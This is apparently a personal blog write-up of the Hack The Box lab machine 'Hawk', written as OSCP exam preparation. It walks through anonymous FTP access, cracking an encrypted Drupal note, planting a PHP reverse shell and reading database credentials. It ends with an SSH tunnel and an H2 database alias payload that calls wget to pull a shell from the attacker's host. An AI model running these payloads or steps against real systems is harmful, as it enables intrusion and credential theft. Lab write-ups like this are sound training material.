Hack The Box / Hawk

3 minute read

Hawk is our eighth machine in the OSCP list provided by NetSec Focus! Flaws with FTP, file coded in base64, services running, tunneling, and a new way to do some privilege escalation are part of this machine with hawk! The learning acquired from here shows some common flaws and misconfigurations. This is the eighth blog before my third attempt to the OSCP exam, so let’s get to it!

nmap scan

Information Gathering

Nmap Scan

So, we start with a nmap scan to check what ports are open and what services are running in this machine.

nmap -sC -sV -p- -oN scan.nmap 10.10.10.102

nmap scan

There are couple ports and services running such as FTP in port 21 (which we can log in an anonymous), SSH in port 22, HTTP in port 80, and H2 Database in port 8082. There are other ports that are not named in this article.

Loging FTP as Anonymous

So as I said before, we can login in FTP as anonymous user, and actually, going to the directory messages there is a file that might contain interesting information which is .drupal.txt.enc

nmap scan

aftergetting the file, we see that has a password and it is base64 encoded, so let’s decode it.

nmap scan

So, to decode we use the command with base64 to get the file.

base64 -d drupal.txt.enc > drupal_decode.txt.enc

nmap scan

Great! Now it’s time to crack the password!

Brute Forcing SSL Salted Password

As we saw the format displayed with the images above, there is a program that can help us to crack this SSL salted password called bruteforce-salted-openssl, and we are using the wordlist rockyou.

root@kali:~/htb/coffee/hawk/10.10.10.102# bruteforce-salted-openssl -t 6 -f /usr/share/wordlists/rockyou.txt -d sha256 drupal_decode.txt.enc
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 27
Tried passwords per second: inf
Last tried password: secret

Password candidate: friends

Great, so the password in order to get this file is friends, let’s see what we find inside.

nmap scan

So, there is a note about the password for the portal, looks like we have to login in our HTTP port from our browser using the password PencilKeyboardScanner123.

Login & Reverse Shell

Getting in the portal from our browser we can login as admin with the password found it before which is PencilKeyboardScanner123, and we’re in! Now it’s time to see how we can get a shell from here.

nmap scan

Looking at different things, there is the possibility to publish an article, but just HTML is allow to put in here, but if we want to execute some php code, in modules, we can see the posibility to allow to write articles in php.

nmap scan

Now, once we set the option to write articles in php, we can go to Add Content and put our php-reverse-shell from Pentest Monkey, then change some parameters such as IP and Port.

nmap scan

Set up a netcat listener, save the file, and get the shell!

nmap scan

Wolah! We got a shell.

User Flag

Extrangely we can get the user flag as www-data!

nmap scan

But, would be nice if we escalate privileges to Daniel, right?

Privileges Escalation to Daniel

Doing basic enumeration, there was information that MySQL was running in the system and drupal can manage some credentials from MySQL, so googling things such as drupal mysql settings, there was a page explaining that you can find the credentials at /var/www/html/sites/default/settings.php and correctly we found some credentials linked to Daniel user.

nmap scan

Now havinf the credentials it’s time to get in the system as Daniel, so

su daniel

We can overpass the python entry by the pty library… nmap scan

And we’re in once again! Also, we can read the flag.

nmap scan

Looks like time to escalate to root, huh?

Privileges Escalation to Root

Do you remember the port 8082 running H2 Database? Well, we can find it in the enumeration by running LinEnum.sh.

nmap scan

we can find it in services as well.

nmap scan

The problem here is that when we visit the website as http://10.10.10.102:8082/ and we can log in due to it’s not allowed to let people from outside to log in. So, having Daniel’s credentials we can do some tunneling and get the service from our local host.

ssh -L 8080:127.0.0.1:8082 daniel@10.10.10.102

So, basically what we’re doing here is to tunnel the service running in port 8082 to our localhost to run in port 8080. Then, after doing this, we can get in http://localhost:8080/.

nmap scan

So, where it says test we can change it to root and get access to the console. Once in the console we can add some kind of MySQL sintax where we can use wget in order to get our reverse shell. The shell used is a Bash TCP shell, so this is the sintax in order to download our file, before doing this remember to set up an HTTP Server in your localhost.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;
CALL SHELLEXEC('wget http://10.10.16.80/shell')

nmap scan

After this is time to rename the file shell to shell.sh and give it execution permisions, after doing it we can set up our netcat listener and call the shell.

nmap scan

Root Flag

After getting the root it’s time read the flag because we owned the system!

nmap scan

To conclude

This machine was complex for me due to my lack of knowledge of MySQL Sintax, there were some good readings in interenet but 0xrick was pretty helpful with this. The privilege escalation was not that curious due to the drupal documentation about the credentials, but stills fun!

Leave a comment